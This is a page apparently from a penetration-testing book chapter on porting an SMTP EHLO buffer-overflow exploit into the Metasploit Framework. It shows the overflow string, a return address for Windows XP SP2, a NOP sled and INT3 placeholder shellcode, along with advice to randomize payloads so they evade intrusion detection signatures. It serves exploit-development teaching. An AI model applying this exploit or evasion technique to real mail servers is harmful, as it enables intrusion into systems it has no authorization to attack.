background image

222

Chapter 15

NOTE

If you declared more than one target, this particular line would select the proper return 
address based on the target you selected when running the exploit. Notice how moving 
the exploit to the Framework is already adding versatility.

sploit = "EHLO "
sploit << "\x41" * 5093
sploit << [target['Ret']].pack('V')
sploit << "\x90" * 32
sploit << "\xcc" * 1000

Re-executing the exploit module should result in a successful jump to 

the INT3 dummy shellcode instructions, as shown in Figure 15-2.

Figure 15-2: A successful jump to dummy shellcode; we are at our user control’s INT3 
instructions.

Adding Randomization

Most intrusion detections systems will trigger an alert when they detect a long 
string of 

A

s traversing the network, because this is a common buffer pattern for 

exploits. Therefore, it’s best to introduce as much randomization as possible 
into your exploits, because doing so will break many exploit-specific signatures. 

To add randomness to this exploit, edit the 

'Targets'

 section in the super 

block to include the offset amount required prior to overwriting EIP, as 
shown here:

'Targets' =>
       [

[ 'Windows XP SP2 - EN', { 'Ret' => 0x7d17dd13, 

'Offset' => 5093

 } ],

       ],